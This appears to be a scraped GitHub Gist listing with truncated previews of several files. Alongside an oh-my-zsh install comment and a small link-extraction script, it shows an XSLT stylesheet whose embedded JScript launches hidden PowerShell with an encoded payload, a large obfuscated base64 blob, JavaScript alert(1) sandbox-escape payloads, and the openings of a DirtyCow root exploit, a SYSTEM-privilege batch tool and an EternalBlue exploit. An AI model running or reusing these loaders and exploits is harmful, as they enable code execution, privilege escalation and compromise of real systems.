This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# | |
# This script should be run via curl: | |
# sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" | |
# or wget: | |
# sh -c "$(wget -qO- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" | |
# | |
# As an alternative, you can first download the install script and run it afterwards: | |
# wget https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh | |
# sh install.sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -enc JABOAEoAZABDAEcAagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMATwBxAEwAZABsAHcAQwAvAHoARQAxAE4AVABFAHkATgB6AEkANQBNAHoAZwB1AE0AVABFACEAdgBWAFoAdABUAHgAcwA1AEUAUAA2AE8AeABIACsAdwBxAHAAVgAyAFYAOQBvAHMAIQBZADYANwBDAHEAawBTAGUAWQBHAFcAdABnAGsAcABDADYAVQBsAGoAUwBwAG4AZAA1AEkAWQB2AE8AdgBGADkAaQBhAGsAaABmADkAKwA0ADMAMwBKAGgAZwBPAHUAMwBKADEAMAArAHkAVwB4AFAAVABNAGUAUAA4AC8ATQBZADEAdQB3ACsAQgBwAEcANwBVAEYATQAzAHAAIQBEAGUAMwBOAGoAawBpAFcAaABaAGkASQBoAFoAegBmAHgAdgBEAE8ATgByAGoAbgA1AHUAYgBsAEIAeQBtADkAIQBKAFkAMgBKAFkAOAAyAHAALwBCADYATABLAE8AUABnAGsAWAB5AFEAUwBoAEY |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
==AMwADMwADMwADMzMTOzEzMlJTOzEzMlJjMzgzMxMTZyczMwMTMzYmZmZGZmlDO4U2MjhTN1UWN3AzY1gzMjFDM3AjY4YzY0cDMjVDO1QmZmJTZ5gjN5ITM4YjN1MTNwADMwAjMwADO2cTN3UWO4MTNxUTOkFDMwADMwADMwATOiNTO1QmZmVTZzUDNhhTN4YzN1ADMwQDMwADM4YDMwADMwEDMwgjNwQTY2UDZmZmN1ITY1IGMmhjNwADM4kzN3IWN5IDMwgjY0E2NjFzMxIWOhhTOzAjNkljMlFWN3E2M2UDNjRTZhFDOmljYhdzN5cjZzQ2N1AjNkJmZilTZ1QDMwYWYiJmM2EmNjhjZ1QmM3QGMzIWOhJWOhZGNxMWOmdDZ4IjMhVTMxATZ5cDN2cTMhlTOyYGO5cDNwMDM1kzY5YTNiNDZkJTNiZTOkRjM4AjYxETO4YTN3IWY4cDOzQjM4YzM3gzN3UDZhZ2MzMWMhJWN3cjMmZmYjVDO5UDZ4QDMhNGOxM2Y5YGZxUDZ1UTNwgTMlBTNwgTYiF2YiJDO4IGMlZWM2gDOmNTM3QjNjBDNjljZmdjYlRGOzYmYyMTO1QGNiRzYlZjZ2MTO1EWN5QGNhhjY2QjMhlzN5QDO2EWOllDNiNWO4EjN5QmN4kjY0IDO1QmM4ImZiVjYxkjMhBzY5EmMhVWOlNWZxIGOiJzMzM2N1ITZyYjZwAjZkhTMmV2NmVDO0U2MlNTN5kjMjZDMjZ2YkJGM0UDM4czM5M2NiV2YmRDNykzYxMzNjZWZ5YGN4YTM4EjNkFGMxIDMwEGMkBTOygjNzYTN3YmN0UDMyI2MwMTZyYzMmJDN3UmN1YDN2kjNycDN1AjMiNDNzYzM3UjZ0cTNwIjYzIzMlJjNzAjM0UTZ0AjMzczN3YmN0YTZ2kjN3UDMyI2MwMTZyAzMxMDMyUDN5QzM1QGNwIjYzUjNjZjM2kjN0cTM2AzNkZjZ2MjN4IDMyAzMlJTNzYmMxYzY2MmN5YTY3YmN |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var a = document.getElementById('rcnt').innerHTML.match(/<a href=\"(.*?)\" ping/g); | |
for (var i=0;i<a.length;i++) | |
{ | |
var method = a[i].match(/"(.*?):\/\//g)[0]; | |
var domain = a[i].split("/")[2]; | |
var result = method+domain | |
console.log(result.substr(1)); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wget --save-cookies cookies.txt --keep-session-cookies http://my-site.dev/app_dev.php/my/page | |
# It's possible to add option "--post-data 'user=foo&password=bar' " if you need to | |
# log in for exemple | |
# Then retrieve the session ID in cookie.txt | |
vendor/h4cc/wkhtmltopdf-amd64/bin/wkhtmltopdf-amd64 \ | |
--cookie 'sessionid' 'gfou6ks1lsguuvtk9il2v169n7' \ | |
--cookie 'PHPSESSID' 'gfou6ks1lsguuvtk9il2v169n7' \ | |
--debug-javascript \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(new Array).filter.constructor('alert(1)')() | |
[].constructor.constructor('alert(1)')() | |
[]['constructor']['constructor']('alert(1)')() | |
[][x='constructor'][x]('alert(1)')() | |
[][ㅤ='constructor'][ㅤ]('alert(1)')() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* A PTRACE_POKEDATA variant of CVE-2016-5195 | |
* should work on RHEL 5 & 6 | |
* | |
* (un)comment correct payload (x86 or x64)! | |
* $ gcc -pthread c0w.c -o c0w | |
* $ ./c0w | |
* DirtyCow root privilege escalation | |
* Backing up /usr/bin/passwd.. to /tmp/bak | |
* mmap fa65a000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
ver|findstr "5\.[0-9]\.[0-9][0-9]*" >NUL 2>NUL && (echo [-] Not Working for winxp\win2k3 &&goto :EOF) | |
del /f /q %result_file% >NUL 2>NUL | |
Rd "%WinDir%\system32\test_permissions" >NUL 2>NUL | |
Md "%WinDir%\System32\test_permissions" 2>NUL||(Echo.& [-] Echo Run as administrator user. &&goto :EOF) | |
set comands=%* | |
if not defined comands ( | |
echo. | |
echo Run as SYSTEM Account Tool |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from impacket import smb | |
from struct import pack | |
import os | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
NewerOlder